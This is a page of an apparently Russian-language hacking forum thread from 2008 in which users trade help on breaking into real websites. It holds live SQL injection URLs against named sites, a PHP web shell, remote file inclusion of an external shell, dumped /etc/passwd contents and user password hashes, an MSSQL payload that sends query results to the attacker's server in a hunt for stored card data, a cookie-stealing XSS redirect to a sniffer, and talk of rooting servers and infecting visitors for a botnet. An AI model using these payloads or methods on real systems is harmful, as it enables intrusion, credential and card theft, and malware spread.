PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

nicusor
23.04.2008, 17:27
там 7 столбцов 100% ..

как подбирать ?
http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,5,6,7+from+<table>/* где <table> самые распространенные имена, правильно?

n0ne
23.04.2008, 17:48
nicusor, правильно. Есть ещё такая штука - посимвольный подбор.

Jokester
23.04.2008, 18:08
nicusor
Друг мой. Интересно зачем задавать вопрос, если не слушать ответа на него?
Специально для тебя я привёл ссылку , пройдя по которой ты увидишь вывод из таблицы
Правда в моей ссылке(как впрочем и в базе) полей 8 и если ты догадаешься убрать из неё пробелы будет гораздо проще

Велемир
23.04.2008, 18:25
Пробывал залить шелл на этот сайт. Почему пишет Warning: system() [function.system]: Cannot execute a blank command in http://site.com/script.php on line 1

В скрипте обычный вызов функции систем().Пробывал с кавычками и без них)
<?php system($_GET['cmd']); ?>

GrAmOzEkA
23.04.2008, 18:26
это значит system отключено, юзай include

Piflit
23.04.2008, 18:28
это значит system отключено, юзай include
это значит, что нужно писать
<?php @system($_GET['cmd']); ?>

GrAmOzEkA
23.04.2008, 18:31
это значит, что нужно писать
имхо include удобнее =), да систем почти всегда отключен.

А как её использывать ?
<?php include($_GET['cmd']); ?>

www.site.com/index.php?cmd=http://shell.ru/shell.txt

Велемир
23.04.2008, 18:33
@system сработало.вот только что делать дальше не пойму))))

Велемир
23.04.2008, 18:35
Хых,самое интересное что инклудить пытался так до того,как ты написал(дошло!:Р),но чёт не вышло.зато @system ошибок не вызвало.знач работает)

Велемир
23.04.2008, 19:01
http://www.kat.kg/index.php?file=http://site.com/shell.php?cmd=ls+-la

Warning: forma_2(http://site.com/shell.php?cmd=ls -la) [function.forma-2]: failed to open stream: HTTP request failed! <html> in /usr/local/www/data-dist/kat/index_rus.inc on line 397

Fatal error: forma_2() [function.require]: Failed opening required 'http://site.com/shell.php?cmd=ls -la' (include_path='.') in /usr/local/www/data-dist/kat/index_rus.inc on line 397

И чойто я хз...Какой-то НТТР запрос чтоль не прокатил?)

Doom123
24.04.2008, 14:37
что делать если например я в sql иньекции в поле вывода пишу скажем 123 он выводит а если пишу
<? phpinfo() ?>(через char())

он вырезает эти строки а точнее вырезается всё от наяала <?

krypt3r
24.04.2008, 15:38
Хочешь сделать php-инклудинг через SQL-инъекцию? о.О Вероятность такого крайне мала. Он тебе выведет <? phpinfo(); ?>, но не выполнит как пхп-код

Doom123
24.04.2008, 15:47
ну я попробовал просто страннно что всё что начинается с <? до ?> обрезается или хз что там происходит и ещё например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл

хотя не, грузит файл

GOGA075
24.04.2008, 15:50
что можно извлеч из файла /etc/passwd ?

it's my
24.04.2008, 15:52
что можно извлеч из файла /etc/passwd ?
логины пользователей

krypt3r
24.04.2008, 15:54
например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл

Должно быть

LOAD_FILE('/etc/passwd')
или
LOAD_FILE("/etc/passwd")
или
LOAD_FILE(0x2F6574632F706173737764)

Если ни тот, ни другой, ни третий запрос не вывел ничего, значит, нет соответствующих прав.

GOGA075
24.04.2008, 15:56
fidim:x:2002:101::/:/ftponly sphera_pop:x:2002:101::/:/bin/sh root:x:0:0::/: bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin: shutdown:x:6:0:shutdown:/sbin: halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: gdm:x:42:42::/home/gdm: xfs:x:43:43:X Font Server:/etc/X11/fs: nobody:x:99:99:Nobody:/: ftp:x:2002:101::/ftp/pub/anonymous:/ftponly tom:x:2002:101::/ftp/pub/tom:/ftponly support:x:2002:101::/ftp/pub/support:/ftponly spice:x:2002:101::/ftp/pub/spice:/ftponly jn:x:2002:101::/var/www/vhosts/fireflyweb:/ftponly fump:x:2002:101::/ftp/pub/fump:/ftponly meef:x:2002:101::/ftp/pub/meef:/ftponly jdelgrosso:x:2002:101::/ftp/pub/jdelgrosso:/ftponly spam:x:2002:101::/ftp/pub/spam:/ftponly manic:x:2002:101::/var/www/vhosts/manicmondays/mp3:/ftponly sdstage:x:2002:101::/var/www/vhosts/suddendeath_stage:/ftponly bugbase:x:2002:101::/var/www/html/bugbase:/ftponly sonicbids:x:2002:101::/ftp/pub/sonicbids:/ftponly

aka PSIH
24.04.2008, 16:05
Doom123
всё что начинается с <? до ?> обрезается
чисто теоретически:
<<??>? phpinfo() ?> - <??> обрежется, получится <? phpinfo() ?>

Doom123
24.04.2008, 16:15
aka PSIH ты был прав) но скрипт не выполнился) вывело просто <? phpinfo()?>

Doom123
24.04.2008, 16:25
кстате через иньекцию команду update можно выполнить? если да дайте плиз пример
например урла с дыркой

www.site.ru/script.php?id=-1+union+select+1,2/*

bag
24.04.2008, 16:34
Задавал не таку давно вопрос, но не получил ни одного ответа. Попытаю удачу еще раз ;)
сканер показал что найдена папка cgi-bin и cgi-bin/formmail.pl, пробовал в браузере зайти на них пишет что таких страниц не существует, как понимать?



кстате через иньекцию команду update можно выполнить?

можно если на то права есть, в разделе sql inj я токо что выложил сайт с норм. правами попробуй его.

Doom123
24.04.2008, 16:40
bag Прв хватает это root просто хочу знать как сформировать запрос

Велемир
24.04.2008, 17:02
В Мускуле кроме селекта нельзя ничего выполнить.

bag
24.04.2008, 17:06
Doom123 ну например update table1 set pole1=12345;
если я прально тя понял...

вобщем синтаксис такой
UPDATE [LOW_PRIORITY] [IGNORE] tbl_name
SET col_name1=expr1 [, col_name2=expr2 ...]
[WHERE where_definition]
[ORDER BY ...]
[LIMIT rows]

Doom123
24.04.2008, 17:14
та я знаю sql я спрашиваю как это сделать через иньекцию

я ж не буду писать

www.site.ru/s?a=-1+update+table+set+col=1,2+where+id+like+1/*

bag
24.04.2008, 17:34
можно попробовать select....+20+and+update...
но не уверен

n0ne
24.04.2008, 17:35
Doom123, если прав хватает можешь как хочешь писать :)

Велемир, сам-то понял что сказал?)

bag
24.04.2008, 17:43
ваще странно, тут права рута
http://www.filmthreat.com/index.php?section=reviews&Id=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32+and+update+us ers+set+email='gg@gg.com'+where+username='jdeagnon '/*

вылетает ошибка. ' - не фильтруется

бывает :)

Scipio
24.04.2008, 18:02
не придумывайте, если инъекция в select запросе, то в мускуле никакие update и иже с ними не используешь
зы про grant вобще отжиг

Велемир
24.04.2008, 18:54
Во, Скиппи за Велю )))))).Теперь как всегда вопрос :

Нашёл скулю(с кем не бывает,по сто за день: )).

Нашёл таблички:

http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,table_name,4+from+information_s chema.tables--

Нашёл колонки:

http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,column_name,4+from+information_ schema.columns--

К Mysql.user закрыт доступ, ибо не руткинс:)).

И ещё: как выполнить запросы,чтобы к конкретной таблице показать конкретные колонки ?(а то хрен разберёшь)). Там цифры стоят возле каждой таблицы (4 или 2 2 2 2 2 2 )Я так понял,это количество полей в каждой таблице.

А запрос похожий видел такой :

-1+union+select+1,2,table_name,4+from+information_s chema.tables+where+column_name=login_id--

(Бред какой-то имхо) (

Интересует, почему нету последних таблиц tbmember и tblogin(долго парился,перебирая имена).Таблицы с префиксом tbl существуют, но колонки от них не подходят(я не все перебрал).Просто колонка member_id по логике должна быть в tbmember. Что за бред?! (

Constantine
24.04.2008, 19:09
Велемир из твоего поста понял процентов 10, а вообще:
А запрос похожий видел такой :

-1+union+select+1,2,table_name,4+from+information_s chema.tables+where+column_name=login_id--
такого запроса ты видеть не мог, т.к он нарушает синтаксис, очевидно login_id должно быть в hex либо к кавычках при маджик_квотс_гпс= Офф

И ещё: как выполнить запросы,чтобы к конкретной таблице показать конкретные колонки ?(а то хрен разберёшь)). Там цифры стоят возле каждой таблицы (4 или 2 2 2 2 2 2 )Я так понял,это количество полей в каждой таблице.
column_name+from+information_schema.columns+where+ table_name=hex(что -то)

Врят ли это колличество полей в таблице xD, видмо просто принтабельные колонки

Велемир
24.04.2008, 19:27
Ну а почему тогда tbmember,tblogin не существуют - это не таблицы чтоли ?(.

Кстати, если выполнить как ты сказал hex(abrakadabra), где абракадабра - имя таблицы,то вернёт 'Item comming soon',а если выполнить запрос сразу *хексанутый*, то выведет :

http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_ schema.columns+where+table_name=0x74626C5F70686F74 6F67616C6C657279--

0x74626C5F70686F746F67616C6C657279 - это tbl_photogallery.

P.S: При запросе http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_ schema.columns+where+table_name=0x74626C6F67696E-- ,где
0x74626C6F67696E - это tbmember, вернуло поля

login_id,login,password,user_name,access_level

Но при запросе

http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,user_name,4+from+tblogin--

Выдаёт,что таблица не найдена. Как тут быть ?( В Hex пробывал

Jokester
24.04.2008, 20:07
Велемир
Когда ты прочитаешь хоть одну статью по скулям?
Эта таблица в другой базе
И предполагая твой следующий вопрос:

база test_sql

Вот вывод всех баз:
_http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,schema_name,3+from+information_ schema.schemata--

Doom123
24.04.2008, 22:16
эньекция? http://www.line-age.ru/statistics.php?show_page=show_clan_info&indx=-1

159932
24.04.2008, 22:48
не так выразился ..

Spyder
25.04.2008, 11:00
159932, и что по твоему в этом странного?

krypt3r
25.04.2008, 11:18
159932, http://ru2.php.net/manual/ru/book.mssql.php

Spyder
25.04.2008, 11:35
гг, вот что действительно странно

Spyder (17:17:53 12/03/2008)
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in /bigdisk/www/html/research/alcator/program/cmod_runs.php on line 119


Spyder (17:18:07 12/03/2008)
меня глючит или это мсскл на линухе?


ettee (17:19:30 12/03/2008)
ой,спудер...


ettee (17:19:32 12/03/2008)
ом


ettee (17:19:37 12/03/2008)
наебывают?


Spyder (17:19:40 12/03/2008)
я хз


Spyder (17:20:37 12/03/2008)
http://www.psfc.mit.edu/research/alcator/program/cmod_runs.php?run=1050525'

Spyder
25.04.2008, 11:40
это значит system отключено, юзай include
поржал)

Macro
25.04.2008, 11:46
Spyder, mssql может быть удаленно расположенной бд

Spyder
25.04.2008, 11:53
не подумал =)

Велемир
25.04.2008, 16:07
Передал параметру одного из сайтов -1+union+select+1,2,3,4,5--

Выдало ошибку : Microsoft OLE DB Provider for SQL Server error '80040e07'

Operand type clash: ntext is incompatible with int

/news/index.asp, line 20

Кроме как cast в голову ничё не приходит. Читал, что взломать можно только сайты с ошибками 80040e14(*идеальная ошибка*).Неужели это так? ( Так мало сайтов тогда уязвимы чтоли Ж(


Предварительно подобрал количество полей.

Да и вот ещё что : попадает ли под красивый запрос такая хрень ? :

Warning: mssql_query(): message: Conversion failed when converting the nvarchar value '-1 order by 1000--' to data type int. (severity 16) in *какой-то путь к скрипту* on line 17


Вот ещё ошибка при выборе из бд -

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'Òàê è æèâåì' to a column of data type int.

/index.asp, line 50

Как преобразовать нормально?)

geforse
25.04.2008, 16:50
https://www.lina2.ru/clans/index.php?showclan=-1+union+select+login,password+from+accounts/*

login:pass

парль зашифрован

base64_encode(pack('H*'sha1($apss)))

Схема БД(спасибо Scipio):

http://www.lina2.ru/clans/index.php?showclan=-268520741+union+select+concat(table_schema,0x3a,ta ble_name,0x3a,column_name),null+from+information_s chema.columns+where+table_schema+like+0x6C3225/*

11099 PkdTSrZ22Jp9HBzYgkJ2yk8nEWI=
membel 9Qu39+nMMEM3kwc1Pb4882N3kt8=
koliaxtx O9yXyh2aY2gj2ExrnFhec93nGpE=
1401 lCOPqkIxlJ637ZxppwwLZ0r5JUA=
15valera15 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o=
16valera16 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o=
19630812 8I2BsLabPCh3DKL7U6z6dlRWfAM=
1lakosta1 hMCldvvsnfyE7bUkzRAIY7ks5R4=
1niger1 zSAcOz7JBqXyFEYnaa9qYyMgfQo=
2008 /D9xitkeYMLqfvGQ9NBpaPBSAPU=
777 /HpzTbpRjwMmCN/rBPTut58CWqc=
888 6qZ/OpPQrLCNil6P+YZvUZg7PDs=
999 r8l+oTH9fiaVqY7zQBNgj5fzTh0=
000 iu+wbEJuB6CmcaHiSItIWNaUpzA=

Вот тут ЛОгин --- ПАСС

Теоритечески можно узнать пароли ?

Doom123
25.04.2008, 17:07
$a = base64_decode('iu+wbEJuB6CmcaHiSItIWNaUpzA=');
$b = unpack('H*',$a);
echo $b;

И нада брутить SHA-1 хэш

Велемир
25.04.2008, 17:44
http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar) ,2,3,4,5,6,7,8,9,10+from+information_schema.column s--

Хули не выходит :(((

SQL~In[J]ecTi0n
25.04.2008, 17:49
Вопрос: есть шелл на 1 сайте.На том же сервере есть еще 2 сайта.Как к ним получить доступ(при помощи уже залитого шелла)?

Ded MustD!e
25.04.2008, 17:52
http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar) ,2,3,4,5,6,7,8,9,10+from+information_schema.column s--

Хули не выходит :(((

Это MSSQL!!!

http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES)--

https://forum.antichat.ru/thread30501.html

Велемир
25.04.2008, 18:20
http://www.donland.ru/news.asp?Id=1+or+1=(select+top+1+author+from+ssf_f orums)--

Выводит какую-то абракадабру.

Вот все таблицы, которые присутствуют на сервере: ).

dtproperties','ssgb2_groups','ssgb2_messages'%20,' ssgb2_messageGroups'%20,'ssgb3_groups'%20,'ssbx_ba nners'%20,'ssbx_clickLogs'%20,'ssf_forums','ssf_fo rumGroups'%20,'ssbx_showLogs','ssf_groups','ssf_me ssages','ssgb0_groups','ssgb0_messageGroups','ssgb 0_messages','ssgb1_groups','ssgb1_messageGroups',' ssgb1_messages','ssgb3_messageGroups','ssgb3_messa ges'%20,'ssis_nodes','ssm_groups','ssm_mailGroups' ,'ssm_mails','ssn_newGroups','ssn_news','ssv_answe rs','ssv_groups','ssv_voteGroups','ssv_votes','sys constraints','syssegments'.

Есть папка admin,в которую нипонятно, что вводить))))).Сомневаюсь, что в какой-то из этих папок есть что-то вроде админ или юзер ))\

Имя выводится как 'Âñå1',и чтойта ? )

cyberia
25.04.2008, 21:02
Здравствуйте!

Нашёл mssql-иньекцию в одном интернет-магазинчике.
Выборку данных оттуда произвожу добавлением в строку запроса подобной штуки:

;insert+into+openrowset('sqloledb','uid=user3000;p wd=pass3000;network=DBMSSOCN;Address=777.777.103.4 ','select+line+from+base3000..tbltest')+select+tab le_name+from+information_schema.tables;--

Таким образом получаю данные на свой сервак. Страница просто перезагружается, данные заливаются ко мне, ошибки не происходит. Все довольны.

В текущей базе есть таблица Orders. В не хранится картон, но есть колонка CCOrderID. Я предполагаю, что картон хранится в другой таблице.

При заказе и оплате картон поля с реквизитами карты передаются в ccorder.asp.

Есть базы данных с именем cybersales. Думаю карты там.

Запрос select+table_name+from+cybersales.information_sche ma.tables не выполняется. Не просто не выдаёт результат на мой сервер, а именно не выполняется. Об этом я сужу по тому, что мне выдаётся HTTP 500 - Internal server error:The page cannot be displayed. А когда запрос корректно выполняется, то просто происходит перезагрузка страницы.

Видимо у текущего пользователя нет прав на просморт бд cybersales.

Делаю запрос select+name+from+master..syslogins. Получаю все логины. Есть cybersalesuser.

Запрос select+password+from+master..sysxlogins выполняется но ничего не выдаёт на мой сервер.

Каковы мой дальнейшие действия? Хочется добраться до картона. Спасибо!

Jokester
25.04.2008, 21:28
Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация? :D)
Вот так не бывает:
"cybersales.information_schema.tables"

information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables
Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА
Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно

cyberia
25.04.2008, 22:00
Давай так: ни о каком картоне мы не говорим,говорим о скуле(как вам конспирация? :D)
Вот так не бывает:
"cybersales.information_schema.tables"

information_schema.tables содержит все таблицы всех баз эта запись означает БАЗА-information_schema,ТАБЛИЦА-tables
Если есть база с именем cybersales то её таблицы тоже будут в information_schema.tables, а доступ к ней через точку т.е. cybersales.ТАБЛИЦА
Если ты можешь выполнить master.. то прав на просмотр скорее всего хватит хотя не 100% конечно

Кажется понял. Ты хочешь сказать, что по запросу select+table_name+from+information_schema.tables выводятся ВСЕ таблицы ВСЕХ баз данных? Не думаю я. Таблиц по этому запросу выводится штук 20. А баз дынных есть штук 45.

Thrasher88
25.04.2008, 22:00
Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))

Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..

Велемир
25.04.2008, 23:04
http://lasgy.tln.edu.ee/?smg=news&ca=2989+or+1%3D1+--+

Сканер показал слепую инъекцию,но у мя ничё не вышло тут. Наяба ? о_О

P.S. : Есть также дыра,позволяющая выполнить произвольный код в OpenSSH.тоже от сканера :)

Уязвимость существует из-за ошибки в процедуре обработки служебных сигналов. Уязвимость позволяет злоумышленнику аварийно завершить работу сервиса OpenSSH или выполнить произвольный код в системе. Для эксплуатации уязвимости необходимо чтобы сервис использовал GSSAPI аутентификацию (параметр GSSAPIAuthentication в файле конфигурации).

Прошу не бить за лог:Р,прост сплойта в нете не нашёл,а сам написать имхо не могу =_=(Знал бы не спрашивал =)).Есть у кого какие идеи ?)

[aywo]
26.04.2008, 10:01
Помогите, пжста! )) на сайте была найдена уязвимость XSS типа если в адресную строку вбить http://site.ru/pages/index.php?=2//какой_то_текст , то все, что стоит после цифры 2 выводится как текст на странице! Вопрос: как это можно использовать? пробовал вставлять <? system($cmd); ?> - не работает.. Вообще конечно хотелось бы просмотреть конфигурационный файл в корне сайта что бы получить доступ к БД. Извините, возможно и глупый вопрос, я просто в этом новичек.. ))

Если вставить после 2 вот это <script>alert()</script> то алерт конечно срабатывает..
почитай вот эти статьи, найдешь много полезно про XSS:
https://forum.antichat.ru/showthread.php?t=11807
https://forum.antichat.ru/showthread.php?t=44125
https://forum.antichat.ru/showthread.php?t=42951

-=megahertz=-
26.04.2008, 12:31
привет всем!
что делать если при таком запросе -9999+UNION+SELECT+1,2,user(),4/*
ну или место юзер датабэйс и.т.д. просто появляется чистый экран.

Spyder
26.04.2008, 12:42
ссылку

На100ящий
26.04.2008, 12:59
www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* как найти полную директорию для записи файла и заливки шелла????

Constantine
26.04.2008, 13:12
У тебя рутовый пользователь
POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(user()+using+ cp1251)+from+mysql.user/* HTTP/1.0
и есть file_priv=Y, значит можешь читать\писать файлы
POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(file_priv+usi ng+cp1251)+from+mysql.user+where+user='root'/* HTTP/1.0
Причем маджик_квотс_гпс отключены.
Твои действия: ищешь httpd.config там ищешь пути до virtualhosts, где в document_root будет лежать полный путь, далее с заливкой шелла по обстоятельствам: можно либо почитать исходники авторизации админки или какие нибудь конфиги, либо влить прямым запросом - пути и способ залить шелл через запрос можно найти здесь на форуме

Scipio
26.04.2008, 14:27
немного поправлю, точное название httpd.conf или vhosts.conf
кстати наличие magic quotes становится для меня во многих случаях не актуально
https://forum.antichat.ru/showpost.php?p=663815&postcount=39

Ershik
26.04.2008, 16:27
омг! пиздец
выполни phpinfo() , найди поля disable functions и скопипасть сюда
disable_function:
Local Value.
system,exec,shell_exec,passthru,popen
Master Value
system,exec,shell_exec,passthru,popen


Дальше как?

На100ящий
26.04.2008, 18:06
www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* Знаю что надо найти *.conf чтоб увидеть полный путь.... Помогите....не получается...

0nep@t0p
26.04.2008, 20:57
Такая трабла - недавно нашел скулю на крупном сайте, начал селектить юзеров из таблицы, но вместо пассов - шифр, явно base64, но расшифровка этого шифра вернула совсем непохожую на пасс строку, думал что хеш, вроде MD5(Base64) но количество символов у разных юзеров меняется, никто не знает, что это за хеш или шифр ?
Examples: VzsGbVZoDDBValUkCCYNdw==
BWcHdAEjVChRMQQz
UWJXZwBnV25XOwUzCmM=
p.s.
Ershik
Хм, вообще то еще Constantine указал на траблу с кодировкой - convert(file_priv+using+cp1251)
Хэши - MySQL v5.x
rusanov
*2632CF75CFB8987B429348FA90905C86DF24D0A7
root
*97757F6F08362A7CBA6F30E72EB90A73C79168EE
admin
*3D07E0D0A6AB1EB78DA1D222570ED89455FB7045
dummy
*9C47AFA62907DE2D94072B9820EFCA74185D5111

Constantine
27.04.2008, 02:18
На100ящий
дефолтные пути к конфигам тут:
https://forum.antichat.ru/thread49775.html
пишешь скриптик или руками через file_priv, далее по накатанной как я написал

satana8920
27.04.2008, 11:49
я конечно прошу прощения за столь ламерский вопрос но как повесить фрейм на страницу с помощью скуль иньекции??

[aywo]
27.04.2008, 12:04
я конечно прошу прощения за столь ламерский вопрос но как повесить фрейм на страницу с помощью скуль иньекции??
если есть file_priv, залить шелл и повесить фрейм :)
по другому никак...

На100ящий
27.04.2008, 14:08
Constantine, уже перепробовал все пути вручную и ничего не подходит, как ещё можно найти путь???

*DeViL*
27.04.2008, 20:38
Подскажите какую ни будь статью о добавлении новых сплоитов к связке сплоитов...

DVD_RW
27.04.2008, 21:03
Сразу к делу.
Проблема с XSS ...
Вот она:
Когда я ввожу XSS ...
а ввожу я его в игру travian.ru он меня перемещат на мой сниффер, но я не знаю , как дать ссылку людям((
примерно вот:
Сначала ввожу: ">
потом no"><script> document.location.href="http://s.netsec.ru/60880.gif?"+encodeURI(document.cookie); </script><


т.е. там speed.travian.ru/allianz.php и всё..а надо чтоб альянс переминовался по "какой нибудь" ссылке... оч прошу - помогите(((

Но там пхп ...я в общем то хз ... попробуйте вот тут:
speed.travian.ru < зарегистрируйтесь , постройте посольство до 3 ЛВЛа... - создайте альянс \и переминуйте его в поле "ally2" ((
Если можно то ответы в 452277469 ! но сюда тоже зайду!
Заранее спасибо! :(


===т.е. мне надо СРАЗУ ссылку сделать , чтобы она переминовала альянс и выходила на линк :)


Подробно обьясню в 452277469 ! TU

GOGA075
27.04.2008, 21:20
Кто-небудь знает есть ли прога или скрипт для перебра лимита и сохранении результата??

SQL~In[J]ecTi0n
27.04.2008, 21:45
Кому не сложно,киньте эксплойт для Linux 2.6.9 для получения root'a.

SQL~In[J]ecTi0n
27.04.2008, 21:48
to На100ящий

Вот ссылка на оч.хорошую статью,посмотри там: https://forum.antichat.ru/thread49775.html

На100ящий
27.04.2008, 21:59
to SQL~In[J]ecTi0n
Читал её уже, хорошая статья, но не выходит!!! /etc/passwd могу прочитать, а httpd.conf найти немогу. Подскажите путь...плз

neon_fx
28.04.2008, 01:28
Кто-небудь знает есть ли прога или скрипт для перебра лимита и сохранении результата??

SQL Injection Pentesting TooL

m0rf
28.04.2008, 09:44
Здравствуйте, прошу прощения за столь глупый вопрос, просто очень нужна помощь.
Суть такова, есть сайт на нем я нашел уязвимость XSS, когда вбиваешь в поля логина и пароля, <script>alert('xss')</script> браузер дружелюбнол выкидывает окошечко, всё как надо. Как мне применить эту уязвимость, в своих целях. Мне нужно стыбрить пароль от админки сайта.

n0ne
28.04.2008, 10:17
m0rf, соц. инженерия. Берешь любой сниффер, перехватываешь запрос авторизации, потом составляешь xss'ку под сниффер вебовый и впариваешь её админу.

з.ы. если непонятно написал, стукни в пм или аську - объясню нормально)

xaker-boss
28.04.2008, 17:39
Может ли мне кто небудь объяснить что делать с этим:
http://www.s3m.com/dma/displayuser.php?user_id=-1224+union+select+1,2,3,4,concat_ws(0x4,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14,15--

user: s3mcom_preylude@localhost
db: s3mcom_main
version: 4.1.22-standard
Я понимаю что это версия и названия бызы данных, ну знаю я эти данные но вить пароля у меня нету! зачем эти инекции тогда?и в каких целях их применять?

.acme
28.04.2008, 17:48
xaker-boss, инъекция как факт. Если она тебе интересна - раскручиваешь.

xaker-boss
28.04.2008, 17:55
Смысле 'раскручиваешь' ? можно поподробней?

На100ящий
28.04.2008, 18:34
Подскажите кто нибудь:
Система UNIX.
В httpd.conf прописано:
<VirtualHost *>
ServerAdmin webmaster@site.com
DocumentRoot /www/htdocs/rail
ServerName www.site.com
# ServerAlias 10.7.103.250
ServerAlias 10.7.100.4
ErrorLog /var/log/apache/railway.log
CustomLog /var/log/apache/railway.log common
</VirtualHost>

Дальше нужно записать файл в директорию /www/htdocs/rail:
www.site.com/index=4&number=1'+union+select+1,2,3,convert(текст+us ing+cp1251)+from+mysql.user+into+outfile+"\\www\\htdocs\\rail\\1.txt"/*

Вроде записалось, проверяем:
www.site.com/1.txt и нифига не получилось... Кто скажет почему???

.acme
28.04.2008, 18:52
xaker-boss, Раскручиваешь в этом случае значит "достаешь максимум информации".
Воспользовать информацией, естественно, можно в любых целях. Начиная от доступа к аккаунтам юзеров на портале(если таковые есть) до заливки шелла.

Вся "раскрутка" описана ранее в статьях.

Могу лишь привести банальный пример:

есть у меня информация типа:

http://haty.com.ua/show.php?id=-90061+union+select+1,database(),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,user(),version(),23,2 4,25/*

5.0.45-community-log

например мне этот ресурс интересен.
Зная, что это 5 ветка MSSQL, я могу воспользоваться информацией, находящейся в infromation_schema.columns, а именно имена столбцов и полей.

17:booltxt
17:--1:text
18:cities
18:--1:text
19:kvbath
19:--1:text
20:kvdata
20:--1:date
20:--2:user
20:--3:meta
20:--4:type
20:--5:city
20:--6:strt
20:--7:stor
20:--8:high
20:--9:bath
20:--10:flor
20:--11:stat
20:--12:stot
20:--13:skit
20:--14:sliv
20:--15:dstr
20:--16:wall
20:--17:hnum
20:--18:pric
20:--19:tele
20:--20:dscr
20:--21:cnam
20:--22:ctel
20:--23:mail
20:--24:agen
21:kvfloor
21:--1:text
22:kvmeta
22:--1:text
23:kvstate
23:--1:text
24:kvtype
24:--1:text
25:kvtype1rp
25:--1:text
26:kvuser
26:--1:password
27:kvwall
27:--1:text

Например меня интересуют данные, касающиеся информации о пользователях:

http://haty.com.ua/show.php?id=-90061+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,concat_ws(0x2020,user,cnam,cte l,city,tele,mail,agen),22,23,24,25+from+kvdata+lim it+0,1--

и получаю что хотел.

Все чисто для примера.

blackybr
28.04.2008, 18:55
На100ящий не хватает прав на диру

-=megahertz=-
28.04.2008, 18:59
интересует такой вопрос...
вот я имею крупный сервер, посещает его довольно таки много человек...
можно ли через этот сайт троянить юзеров??(и как)
цель: поднять ботнет сеть.

На100ящий
28.04.2008, 19:31
Права есть 'y', рутовые....

-=megahertz=-
28.04.2008, 19:38
права над сервером полные!

}{0TT@БЬ)Ч
28.04.2008, 19:50
На100ящий
с чего ты взял что рутовые?

-=megahertz=-
можно ли через этот сайт троянить юзеровконечно можно,совсем не давно моя ася так и ушла:),благодарю того человека который ее вернул.)
ps:вот почитай http://forum.antichat.ru/thread58732.html может пригодится.

-=megahertz=-
28.04.2008, 19:53
}{0tt@БЬ)Ч
ну взял с того что я могу творить над сервером все что хочу...

n0ne
29.04.2008, 01:02
-=megahertz=-, напиши в консоли whoami;id и скинь результат

-=megahertz=-
29.04.2008, 07:14
server
uid=1000(server) gid=1000(server) groups=1000(server)

Karantin
29.04.2008, 07:42
}{0tt@БЬ)Ч
ну взял с того что я могу творить над сервером все что хочу...
uid=1000(server) gid=1000(server) groups=1000(server)
это не всё что хочу, ты заблуждаешься.
даже uid=0(root) gid=0(root) groups=0(root) может не дать тебе всех прав, бывает и такое.

n0ne
29.04.2008, 09:33
-=megahertz=-, напиши там же uname -a и скинь результат, или сам поищи на милворме или просто в гугле сплойт

-=megahertz=-
29.04.2008, 14:25
-=megahertz=-, напиши там же uname -a и скинь результат
Linux vs-server 2.6.18-5-xen-686 #1 SMP Mon Dec 24 20:49:58 UTC 2007 i686 GNU/Linux

Thrasher88
29.04.2008, 17:32
